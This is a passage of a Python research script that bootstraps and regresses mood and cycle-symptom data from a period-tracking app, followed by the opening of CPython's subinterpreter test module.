bootstrap_regression_amplitude_errorbars, bootstrap_regressions_of_period_effects, bootstrap_daily_time_series are
boolean flags which specify which analyses we actually have to run. kwargs specify kwargs for these analyses.
bootstrap_seeds specifies which seeds to use to select user_id_hases, and return_dict lets us store the data for multiprocessing.
"""
grouped_d = d.groupby('user_id_hash')
unique_user_ids = sorted(list(set(d['user_id_hash'])))
for iterate in range(len(bootstrap_seeds)):
seed = bootstrap_seeds[iterate]
reproducible_random_sampler = random.Random(seed)
results_for_iterate = {'linear_regression_bootstrapped_iterates':None,
'period_effects_with_covariates':None,
'daily_time_series_no_individual_mean':None}
print("Multithreaded bootstrap iterate %i/%i, seed %i" % (iterate + 1, len(bootstrap_seeds), seed))
t0 = time.time()
sampled_ids = [reproducible_random_sampler.choice(unique_user_ids) for i in unique_user_ids] # sample with replacement
bootstrapped_d = pd.concat([grouped_d.get_group(user) for user in sampled_ids])
bootstrapped_d.index = range(len(bootstrapped_d))
t1 = time.time()
if bootstrap_regression_amplitude_errorbars:
results_for_iterate['linear_regression_bootstrapped_iterates'] = fit_linear_regression(bootstrapped_d, **regression_amplitude_kwargs)
if bootstrap_regressions_of_period_effects:
results_for_iterate['period_effects_with_covariates'] = fit_regression_of_period_effects(bootstrapped_d, **period_effects_kwargs)
if bootstrap_daily_time_series:
results_for_iterate['daily_time_series_no_individual_mean'] = compute_means_by_date(bootstrapped_d, remove_individual_means=True)
print("Time to compute bootstrapped dataframe: %2.3f seconds; time to do analysis %2.3f seconds" % (t1 - t0, time.time() - t1))
return_dict[seed] = results_for_iterate
gc.collect()
def do_all_bootstrapped_analyses(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
n_iterates,
regression_amplitude_kwargs,
period_effects_kwargs,
n_processes_to_use=25):
"""
Manager job for parallelizing bootstrap analyses.
"""
manager = Manager()
return_dict = manager.dict()
processes = []
chunk_size = int(n_iterates / n_processes_to_use)
all_bootstrap_seeds = []
for process_idx in range(n_processes_to_use):
if process_idx < n_processes_to_use - 1:
bootstrap_seeds = range(process_idx * chunk_size, (process_idx + 1) * chunk_size)
else:
bootstrap_seeds = range(process_idx * chunk_size, n_iterates)
all_bootstrap_seeds += bootstrap_seeds
args = [d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
regression_amplitude_kwargs,
period_effects_kwargs,
bootstrap_seeds,
return_dict]
p = Process(target=bootstrapped_analyses_one_process, args=tuple(args))
processes.append(p)
print("Process %i has %i seeds (%i-%i)" % (process_idx, len(bootstrap_seeds), min(bootstrap_seeds), max(bootstrap_seeds)))
time.sleep(5)
for process in processes:
process.start()
for process in processes:
process.join()
assert all_bootstrap_seeds == range(n_iterates)
assert len(return_dict.keys()) == n_iterates
bootstrapped_results = []
for i in range(n_iterates):
bootstrapped_results.append(return_dict[i])
print("Completed all processes")
return bootstrapped_results
def fit_regression_of_period_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect, min_obs_for_group, min_users_for_group, specifications=None):
"""
Examines how much the period effect varies based on various covariates.
In the simple univariate case (eg, good_mood ~ near_period * C(country)) the estimates are the same as the
binary effects estimated by binary_analysis_no_individual_mean.
"""
print("Performing linear regression of binarized period effects. First removing individual means.")
d = deepcopy(d)
d['year'] = d['date'].map(lambda x:x.split('-')[0])
assert d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
d = remove_individual_means_from_df(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
assert pd.isnull(d['country']).sum() == 0
good_vals_for_group = {}
for grouping in ['categorical_age', 'country']:
good_vals_for_group[grouping] = set()
grouped_d = d.groupby(grouping)
for group_id, group_df in grouped_d:
n_obs = len(group_df)
n_users = len(set(group_df['user_id_hash']))
if n_obs >= min_obs_for_group and n_users >= min_users_for_group:
good_vals_for_group[grouping].add(group_id)
else:
print("Not producing estimates for group %s=%s because too few users (%i) or observations (%i)" % (grouping,
group_id, n_users, n_obs))
#good_country_idxs = d['country'].map(lambda x:x in good_vals_for_group['country'])
#good_age_idxs = pd.isnull(d['categorical_age']) | d['categorical_age'].map(lambda x:x in good_vals_for_group['categorical_age'])
#print("Prior to removing very rare values of country and group, %i values" % len(d))
#d = d.loc[good_age_idxs & good_country_idxs]
#d.index = range(len(d))
#print("After removing very rare values of country and group, %i values" % len(d))
# While we use all datapoints for fitting, we only generate estimates for an age group or country if we have enough datapoints in the group.
all_age_groups_to_generate_estimates_for = [a for a in sorted(list(set(d['categorical_age'].dropna()))) if a in good_vals_for_group['categorical_age']]
all_country_groups_to_generate_estimates_for = [a for a in sorted(list(set(d['country']))) if a in good_vals_for_group['country']]
all_results = {}
behavior_controls = ['logged_any_alcohol',
'logged_any_cigarettes',
'logged_any_exercise',
'logged_birth_control_pill',
'logged_hormonal_birth_control',
'logged_iud']
app_usage_controls = ['n_symptom_categories_used', 'start_year', 'total_symptoms_logged']
if specifications is None:
specifications = ['near_period']
for cov_set in [['country'],
['categorical_age'],
['country', 'categorical_age'],
['country', 'categorical_age'] + behavior_controls,
['country', 'categorical_age'] + behavior_controls + app_usage_controls]:
specifications.append('+'.join(['near_period*C(%s)' % cov for cov in cov_set]))
# sample a small subset to predict on. 100000 should give us values very close to true one but this is much faster.
# We fit the model on the whole dataset; we just use the small sample for computing the true
n_points_to_sample = min(len(d), 100000)
random_idxs = random.sample(range(len(d)), n_points_to_sample)
data_to_predict_on = deepcopy(d.iloc[random_idxs])
data_to_predict_on.index = range(len(data_to_predict_on))
original_ages = deepcopy(data_to_predict_on['categorical_age'].values)
original_countries = deepcopy(data_to_predict_on['country'].values)
for specification in specifications:
print("Results for %s" % specification)
t0 = time.time()
model = sm.OLS.from_formula('good_mood ~ %s' % specification, data = d).fit()
model_results = {'params':model.params, 'pvalues':model.pvalues, '95_CI':model.conf_int()}
all_results[specification] = {}
all_results[specification]['model_results'] = model_results
# loop over countries + ages and make predictions for each.
for col_to_alter in ['categorical_age', 'country']:
print("Computing expected period effects for %s" % col_to_alter)
predicted_effects_by_group = {}
if col_to_alter == 'categorical_age':
groups_to_loop_over = all_age_groups_to_generate_estimates_for
original_values = deepcopy(original_ages)
else:
groups_to_loop_over = all_country_groups_to_generate_estimates_for
original_values = deepcopy(original_countries)
for group in groups_to_loop_over:
data_to_predict_on[col_to_alter] = group
data_to_predict_on['near_period'] = False
off_period_predictions = model.predict(data_to_predict_on)
data_to_predict_on['near_period'] = True
on_period_predictions = model.predict(data_to_predict_on)
predicted_effect = on_period_predictions.mean() - off_period_predictions.mean()
print("Predicted average period effect for specification %s, %s=%s: %2.3f" % (specification,
col_to_alter,
group,
predicted_effect))
predicted_effects_by_group[group] = predicted_effect
data_to_predict_on[col_to_alter] = deepcopy(original_values) # put things back the way they were before
all_results[specification]['predicted_effects_by_%s' % col_to_alter] = predicted_effects_by_group
print("Time to run regression: %2.3f seconds" % (time.time() - t0))
return all_results
def extract_results_from_statsmodels_ranef_model(model):
# do not want model.params. https://github.com/statsmodels/statsmodels/issues/3532
print(model.summary())
results = {'random_effects_covariance':model.cov_re,
'random_effects_covariance_errors':model.bse_re,
'fixed_effects_coefficients':model.fe_params,
'fixed_effects_standard_errors':model.bse_fe,
'ranef':model.random_effects}
for k in ['fixed_effects_coefficients',
'fixed_effects_standard_errors',
'random_effects_covariance',
'random_effects_covariance_errors']:
if k != 'ranef':
print k, '\n', results[k].to_string()
return results
def fit_mixed_model_regression(d, n_people_to_fit_on, covariates_for_regression, min_obs_per_user=1, use_lme4=False):
"""
subsamples a dataset to fit a mixed model regression on. Robustness check.
"""
for c in covariates_for_regression:
assert c[:2] == 'C('
t0 = time.time()
print("Performing mixed model regression (with individual fixed effects) for %i people" % n_people_to_fit_on)
user_obs_counts = Counter(d['user_id_hash'])
potential_users_to_sample = [user for user in user_obs_counts.keys() if user_obs_counts[user] >= min_obs_per_user]
print("After filtering out users with fewer than %i obs, %i/%i users remain" % (min_obs_per_user,
len(potential_users_to_sample),
len(user_obs_counts.keys())))
n_people_to_fit_on = min(len(potential_users_to_sample), n_people_to_fit_on)
random_users = set(random.sample(list(potential_users_to_sample), n_people_to_fit_on))
small_d = deepcopy(d.loc[d['user_id_hash'].map(lambda x:x in random_users)])
print("Total number of users: %i; total number of rows %i" % (len(set(small_d['user_id_hash'])), len(small_d)))
small_d['year'] = small_d['date'].map(lambda x:x.split('-')[0])
assert small_d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
cols_to_examine = ['good_mood', 'year', 'month', 'weekday', 'local_hour', 'date_relative_to_period', 'user_id_hash']
assert len(small_d[cols_to_examine].dropna()) == len(small_d)
assert np.isfinite(small_d['good_mood']).all()
print 'fitting OLS model as a test'
ols_model_to_test = sm.OLS.from_formula('good_mood ~ %s' % ('+'.join(covariates_for_regression)), data=small_d).fit()
print 'Params that do not have user id hash'
print ols_model_to_test.params.loc[ols_model_to_test.params.index.map(lambda x:'user_id_hash' not in x)]
print("Maximum absolute value of the parameters in the ols model: %2.3f" % np.abs(ols_model_to_test.params).max())
print small_d[cols_to_examine].head()
for c in cols_to_examine:
assert pd.isnull(small_d[c]).sum() == 0
print '%s ranges from %s to %s, %i unique values' % (c, small_d[c].min(), small_d[c].max(), len(set(small_d[c])))
if not use_lme4:
#raise Exception("This is deprecated and not guaranteed to work.")
print("Now fitting mixed model using statsmodels!")
model = smf.mixedlm('good_mood ~ %s' % ('+'.join(covariates_for_regression)),
small_d,
groups = small_d["user_id_hash"])
fit_results = model.fit(method='cg')
print fit_results.summary()
print 'Model.score applied to params_object'
print model.score(fit_results.params_object)
model_results = extract_results_from_statsmodels_ranef_model(fit_results)
else:
print("Fitting mixed model regression using R!")
# confirmed that the fixed effects look similar to statsmodels and the extracted pandas dataframe
# look similar to the R summary.
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
from rpy2.robjects import pandas2ri
import warnings
#from rpy2.robjects.conversion import localconverter
raise Exception("Not working at present. Maybe see here: https://stackoverflow.com/questions/42127093/how-to-use-the-r-with-operator-in-rpy2/42127457")
print("Doing R imports")
base = importr('base')
nlme = importr('nlme')
lme4 = importr('lme4')
print("Activating pandas2ri")
pandas2ri.activate()
print("Turning warnings on")
robjects.r('options(warn=1)') # we want to know about it if R throws warnings, so we set the warning flag high.
small_d.index = range(len(small_d))
# put strings into R format. This is a pain, because I don't know how to properly deal with factors in R to Python conversion.
for i in range(len(covariates_for_regression)):
covariates_for_regression[i] = covariates_for_regression[i].replace('C(', '').replace(')', '').split(', Treatment')[0] # split is for date_relative_to_period, we want to remove it.
if covariates_for_regression[i] == 'date_relative_to_period':
desired_period_vals = range(-20, 21)
assert sorted(list(set(small_d[covariates_for_regression[i]]))) == desired_period_vals
# truly terrible hack: map original values to ascii strings
# the reason we do this is to make sure the base level is correct.
# we want it to be 0.
# so base level must be lexicographically first.
# so we take the first 21 letters of the alphabet in reverse order
# t, s, ..., a and then add on A B C D
# the key point is that the 21st letter must be lexicographically first.
# because this corresponds to date_relative_to_period = 0
period_ascii_mapping = (string.ascii_lowercase[:21][::-1] + string.ascii_uppercase)[:41]
assert period_ascii_mapping[20] == 'a'
small_d[covariates_for_regression[i]] = small_d[covariates_for_regression[i]].map(lambda x:period_ascii_mapping[int(x) + 20])
else:
small_d[covariates_for_regression[i]] = small_d[covariates_for_regression[i]].map(lambda x:'STRING_' + str(x))
print("the covariates being used in a mixed model regression are %s" % 'good_mood~%s+(1|user_id_hash)' % ('+'.join(covariates_for_regression)))
print("the head of the dataframe is")
print(small_d.head())
dfr = pandas2ri.py2ri(small_d)
print("done converting to R dataframe")
formula = robjects.Formula('good_mood~%s+(1|user_id_hash)' % ('+'.join(covariates_for_regression)))
print("done converting to R formula")
r_regression_results=lme4.lmer(formula,data=dfr)
print("done fitting regression")
regression_summary = base.summary(r_regression_results)
print("done summarizing regression")
coefs = regression_summary.rx2('coefficients')
pd_coefs = pd.DataFrame(np.array(coefs), columns=list(coefs.colnames), index=list(coefs.rownames))
model_results = {'random_effects_covariance':None,
'random_effects_covariance_errors':None,
'fixed_effects_coefficients':pd_coefs['Estimate'],
'fixed_effects_standard_errors':pd_coefs['Std. Error'],
'ranef':None,
'n_obs':len(small_d),
'n_groups':len(set(small_d['user_id_hash']))}
for k in ['fixed_effects_coefficients', 'fixed_effects_standard_errors']:
print(k)
def process_R_regression_coefs_into_standard_format(x):
if 'Intercept' in x:
return x
elif 'date_relative_to_period' in x:
reverse_mapping = dict(zip(period_ascii_mapping, desired_period_vals))
return 'C(date_relative_to_period)[T.%.1f]' % reverse_mapping[x.replace('date_relative_to_period', '')]
return 'C(' + x.replace('STRING_', ')[T.') + ']'
model_results[k].index = model_results[k].index.map(process_R_regression_coefs_into_standard_format)
for date_relative_to_period in range(-20, 21):
coef_name = 'C(date_relative_to_period)[T.%2.1f]' % date_relative_to_period
if date_relative_to_period == 0:
assert coef_name not in list(model_results[k].index)
else:
assert coef_name in list(model_results[k].index)
print model_results[k].to_string()
print "Successfully performed mixed model regression. Total time taken %2.3f seconds" % (time.time() - t0)
return model_results
def fit_logistic_regression(d):
"""
checked. Performs a logistic regression on day of year, weekday, and period date.
"""
d = deepcopy(d)
polynomial_order = 5
d['day_of_year'] = d['date'].map(lambda x:datetime.datetime.strptime(x.split()[0], '%Y-%m-%d').timetuple().tm_yday)
d['good_mood'] = d['good_mood'] * 1.
formula_string = 'good_mood ~ weekday'
for poly in range(1, polynomial_order + 1):
d['period_x_%i' % poly] = d['date_relative_to_period'] ** poly
d['day_of_year_%i' % poly] = d['day_of_year'] ** poly
d['utc_hour_%i' % poly] = d['utc_hour'] ** poly
formula_string = formula_string + ' + period_x_%i + day_of_year_%i + utc_hour_%i' % (poly, poly, poly)
model = sm.Logit.from_formula(formula_string, data = d).fit()
print model.summary()
model_results = {'params':model.params, 'pvalues':model.pvalues}
return model_results
def get_covariates_for_regression(symptom_key):
assert type(symptom_key) is str
assert '_versus_' in symptom_key
covariates_for_regression = ['C(year)',
'C(month)',
'C(weekday)',
'C(local_hour)',
"C(date_relative_to_period, Treatment(reference=0))"]
if HEART_SUBSTRING in symptom_key:
# don't need year covariates for heart data.
covariates_for_regression.remove('C(year)')
no_hourly_list = [WEIGHT_SUBSTRING, HEART_SUBSTRING, BBT_SUBSTRING, 'sex*', 'sleep*', 'exercise*']
for substring in no_hourly_list:
if substring in symptom_key:
covariates_for_regression.remove('C(local_hour)')
print 'The regression covariates for %s are' % symptom_key
print covariates_for_regression
return covariates_for_regression
def return_results_of_analyses_as_dictionary(d,
symptom_key,
compute_interactions,
do_regression,
compute_individual_level_effects,
compute_daily_means,
compute_derivative_estimates,
compute_individual_effects_using_median_method,
do_mixed_model_regression,
do_binary_analysis,
do_regressions_of_period_effects,
do_regression_with_alternate_seasonal_specifications,
bootstrap_regression_amplitude_errorbars,
do_regression_with_alternate_period_specifications,
start_day_for_period_individual_effect=None,
end_day_for_period_individual_effect=None,
bootstrap_daily_time_series=False):
"""
performs the basic analyses on a dataframe and returns the results in a dictionary. Checked.
"""
covariates_for_regression = get_covariates_for_regression(symptom_key) # Eg, we do not want to regress on year for HR.
results = {
'take_simple_means_by_group':take_simple_means_by_group(d, remove_individual_means = False),
'take_simple_means_by_group_no_individual_mean':take_simple_means_by_group(d, remove_individual_means = True),
'overall_positive_frac':d['good_mood'].mean(),
'overall_n_obs':len(d),
'overall_n_users':len(set(d['user_id_hash'])),
'unique_user_ids':set(d['user_id_hash']),
'start_day_for_period_individual_effect':start_day_for_period_individual_effect,
'end_day_for_period_individual_effect':end_day_for_period_individual_effect
}
if do_regressions_of_period_effects:
results['period_effects_with_covariates'] = fit_regression_of_period_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect,
min_users_for_group=MIN_USERS_FOR_SUBGROUP,
min_obs_for_group=MIN_OBS_FOR_SUBGROUP)
# put all our bootstrapping in one place.
if bootstrap_regression_amplitude_errorbars or do_regressions_of_period_effects or bootstrap_daily_time_series:
bootstrap_regressions_of_period_effects = do_regressions_of_period_effects
bootstrapped_results = do_all_bootstrapped_analyses(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
n_iterates=N_BOOTSTRAP_ITERATES,
regression_amplitude_kwargs={'covariates_for_regression':covariates_for_regression},
period_effects_kwargs={'start_day_for_period_individual_effect':start_day_for_period_individual_effect,
'end_day_for_period_individual_effect':end_day_for_period_individual_effect,
'min_users_for_group':MIN_USERS_FOR_SUBGROUP,
'min_obs_for_group':MIN_OBS_FOR_SUBGROUP,
'specifications':['near_period*C(categorical_age)']})
if do_regressions_of_period_effects:
results['period_effects_with_covariates']['bootstrapped_iterates'] = [a['period_effects_with_covariates'] for a in bootstrapped_results]
results['linear_regression_bootstrapped_iterates'] = [a['linear_regression_bootstrapped_iterates'] for a in bootstrapped_results]
results['bootstrapped_daily_time_series'] = [a['daily_time_series_no_individual_mean'] for a in bootstrapped_results]
if do_regression:
results['linear_regression'] = fit_linear_regression(d, covariates_for_regression)
if do_regression_with_alternate_seasonal_specifications:
results['linear_regression_with_alternate_seasonal_specifications'] = fit_regression_with_alternate_seasonal_specifications(d, covariates_for_regression)
if do_regression_with_alternate_period_specifications:
results['linear_regression_with_alternate_period_specifications'] = fit_regression_with_alternate_period_specifications(d, covariates_for_regression)
if compute_interactions:
results['interaction_between_cycles'] = find_interaction_between_cycles(d,
remove_individual_means = True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
#results['person_specific_interaction_between_cycles'] = find_person_specific_interactions_between_cycles(d)
if do_mixed_model_regression:
results['mixed_model_regression'] = fit_mixed_model_regression(d, 100000, covariates_for_regression)
if compute_individual_level_effects:
results['individual_level_cycle_effects'] = fast_compute_individual_level_cycle_effects(d,
start_day_for_period_individual_effect,
end_day_for_period_individual_effect)
if compute_daily_means:
results['means_by_date'] = compute_means_by_date(d, remove_individual_means=False)
results['means_by_date_no_individual_mean'] = compute_means_by_date(d, remove_individual_means=True)
if compute_derivative_estimates:
looparound_derivative_estimates, no_looparound_derivative_estimates = \
estimate_derivatives_for_all_four_types_of_cycles(d)
results['derivative_estimates_with_looparound'] = looparound_derivative_estimates
results['derivative_estimates_with_no_looparound'] = no_looparound_derivative_estimates
if compute_individual_effects_using_median_method:
results['individual_effects_using_median_method'] = compute_individual_level_cycle_effects_for_period_by_splitting_into_two_and_taking_median(d)
if do_binary_analysis:
results['binary_analysis'] = compute_diffs_in_binary_variable(d,
remove_individual_means = False,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
results['binary_analysis_no_individual_mean'] = compute_diffs_in_binary_variable(d,
remove_individual_means=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect)
return results
def do_analyses_on_big_symptom_dataframe(all_symptom_groups):
"""
Do regression and simple mean analysis on all symptom data.
Checked.
"""
period_effect_bin_size = 7
# outer loop: symptoms to look at. Save each result in a separate file.
for symptom_group in all_symptom_groups:
# note that symptom_group is a list here, not a string.
all_results = {}
d = dataprocessor.load_dataframe_for_symptom_group(symptom_group, chunks_to_use)
d['season'] = d['month'].map(get_season)
if len(symptom_group) == 1:
assert 'continuous_features' in symptom_group[0]
good_symptom = symptom_group[0]
bad_symptom = 'continuous_features*null'
compute_derivative_estimates = False
if WEIGHT_SUBSTRING in good_symptom:
compute_individual_effects_using_median_method = False
else:
compute_individual_effects_using_median_method = True
else:
good_symptom, bad_symptom = symptom_group
compute_derivative_estimates = False
compute_individual_effects_using_median_method = False
symptom_key = '%s_versus_%s' % (good_symptom, bad_symptom)
all_results[symptom_key] = {}
# compute basic statistics on the users we remove prior to any filtering (this is just a robustness check to show we're not hiding anything and they have cycles too)
all_results[symptom_key]['ALL_OMITTED_USERS_ROBUSTNESS_CHECK_ONLY'] = {}
omitted_data = d.loc[pd.isnull(d['very_active_loggers'])]
print 'Doing analysis on %i rows of omitted data' % len(omitted_data)
all_results[symptom_key]['ALL_OMITTED_USERS_ROBUSTNESS_CHECK_ONLY'][True] = return_results_of_analyses_as_dictionary(omitted_data,
symptom_key=symptom_key,
compute_interactions=False,
do_regression=True,
compute_individual_level_effects=False,
compute_daily_means=True,
compute_derivative_estimates=False,
compute_individual_effects_using_median_method=False,
do_mixed_model_regression=False,
do_binary_analysis=False,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=False,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=False)
if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS:
print("Warning! Filtering for very active loggers.")
print("Prior to filtering, %i rows, %i users." % (len(d), len(set(d['user_id_hash']))))
d = d.loc[d['very_active_loggers'] == True]
d.index = range(len(d))
print("After filtering, %i rows, %i users." % (len(d), len(set(d['user_id_hash']))))
# First do all results (no substratification)
# first we have to compute the most dramatic period bin.
print("Now computing bin with most dramatic period effect using regression data + bin size of %i" % period_effect_bin_size)
regression_covariates = get_covariates_for_regression(symptom_key)
regression_results = fit_linear_regression(d, regression_covariates)
data = deepcopy(convert_regression_format_to_simple_mean_format(regression_results, 'linear_regression'))
data = data['date_relative_to_period']
start_day_for_period_individual_effect = extract_most_dramatic_period_bin(data, bin_size=period_effect_bin_size)
end_day_for_period_individual_effect = start_day_for_period_individual_effect + period_effect_bin_size
all_results[symptom_key]['no_substratification'] = return_results_of_analyses_as_dictionary(d,
symptom_key=symptom_key,
compute_interactions = True,
do_regression = True,
compute_individual_level_effects = True,
compute_daily_means=True,
compute_derivative_estimates=compute_derivative_estimates,
compute_individual_effects_using_median_method=compute_individual_effects_using_median_method,
do_mixed_model_regression=True,
do_binary_analysis=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_regressions_of_period_effects=True,
do_regression_with_alternate_seasonal_specifications=True,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=True)
# Now look at results broken down by substratification.
for col in COLS_TO_STRATIFY_BY:
substratifications_to_results = {} # dictionary that maps substratification levels to results.
c = Counter(d[col].dropna())
for val in c.keys():
if c[val] < 1000:
print("Skipping %s=%s because too few values (%i)" % (col, val, c[val]))
continue
idxs = d[col] == val
assert np.isnan(idxs).sum() == 0
substratification_d = deepcopy(d.loc[idxs])
print '\nAnalyzing substratification %s = %s (%i points)' % (col, val, idxs.sum())
if col == 'very_active_northern_hemisphere_loggers':
substrat_results = return_results_of_analyses_as_dictionary(substratification_d,
symptom_key=symptom_key,
compute_interactions = True,
do_regression = True,
compute_individual_level_effects = True,
compute_daily_means=True,
compute_derivative_estimates=compute_derivative_estimates,
compute_individual_effects_using_median_method=compute_individual_effects_using_median_method,
do_mixed_model_regression=True,
do_binary_analysis=True,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=True,
bootstrap_regression_amplitude_errorbars=True,
do_regression_with_alternate_period_specifications=True,
bootstrap_daily_time_series=True)
else:
substrat_results = return_results_of_analyses_as_dictionary(substratification_d,
symptom_key=symptom_key,
compute_interactions = False,
do_regression = True,
compute_individual_level_effects = False,
compute_daily_means=True,
compute_derivative_estimates=False,
compute_individual_effects_using_median_method=False,
do_mixed_model_regression=False,
start_day_for_period_individual_effect=start_day_for_period_individual_effect,
end_day_for_period_individual_effect=end_day_for_period_individual_effect,
do_binary_analysis=True,
do_regressions_of_period_effects=False,
do_regression_with_alternate_seasonal_specifications=False,
bootstrap_regression_amplitude_errorbars=False,
do_regression_with_alternate_period_specifications=False)
substratifications_to_results[val] = substrat_results
all_results[symptom_key]['by_' + col] = substratifications_to_results
very_active_logger_string = 'VERY_ACTIVE_LOGGERS_' if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS else ''
file_handle = open(os.path.join(base_results_dir, '%s%s_versus_%s_n_chunks_to_use_%i.pkl' % (very_active_logger_string, good_symptom, bad_symptom, n_chunks_to_use)), 'wb')
cPickle.dump(all_results, file_handle)
file_handle.close()
print("Successfully completed analysis of symptoms.")
def multithreaded_do_analyses_on_big_symptom_dataframe():
"""
Checked. Runs multiple symptom pairs at one time.
"""
raise Exception("This is deprecated!")
n_processes = len(ALL_SYMPTOM_GROUPS)
processes = []
for process_idx in range(n_processes):
pairs_for_process = deepcopy(ALL_SYMPTOM_GROUPS[process_idx::n_processes])
print(pairs_for_process)
p = Process(target=do_analyses_on_big_symptom_dataframe,
kwargs={'all_symptom_groups':pairs_for_process})
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print("All processes completed successfully")
def get_jobs_that_crashed():
jobs_to_rerun = []
for i in range(len(ALL_SYMPTOM_GROUPS)):
completed_successfully = False
f = open('%s/compare_to_seasonal_cycles_symptom_group_%i.out' % (base_processing_outfile_dir, i))
for line in f:
if 'Successfully completed analysis of symptoms.' in line:
completed_successfully = True
if not completed_successfully:
print("Job %i must be rerun." % i)
jobs_to_rerun.append(i)
else:
print("Job %i finished successfully." % i)
return jobs_to_rerun
def run_single_symptom_group(i):
os.system('nohup python -u compare_to_seasonal_cycles.py %i > %s/compare_to_seasonal_cycles_symptom_group_%i.out &' % (i, base_processing_outfile_dir, i))
if __name__ == '__main__':
os.environ["OMP_NUM_THREADS"]="5"
if len(sys.argv) == 1:
for i in range(len(ALL_SYMPTOM_GROUPS)):
run_single_symptom_group(i)
elif len(sys.argv) == 2:
if sys.argv[1] == 'just_jobs_that_didnt_finish':
jobs_to_rerun = get_jobs_that_crashed()
print "Rerunning jobs"
print(jobs_to_rerun)
for i in jobs_to_rerun:
run_single_symptom_group(i)
else:
i = int(sys.argv[1])
do_analyses_on_big_symptom_dataframe([ALL_SYMPTOM_GROUPS[i]])
else:
raise Exception("must be called with 0 or 1 arguments.")
"""
opposite_symptom_list = [line.split(',') for line in open('clue_opposite_symptom_list.csv').read().split('\n')]
d = pd.read_csv(os.path.join(base_clue_data_dir, 'medium_symptoms.csv'))
users_to_starts = make_users_to_starts()
processes = []
for process_idx in range(len(opposite_symptom_list)):
args = [d, users_to_starts, opposite_symptom_list[process_idx][0], opposite_symptom_list[process_idx][1]]
p = Process(target=fit_model, args=tuple(args))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
"""
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
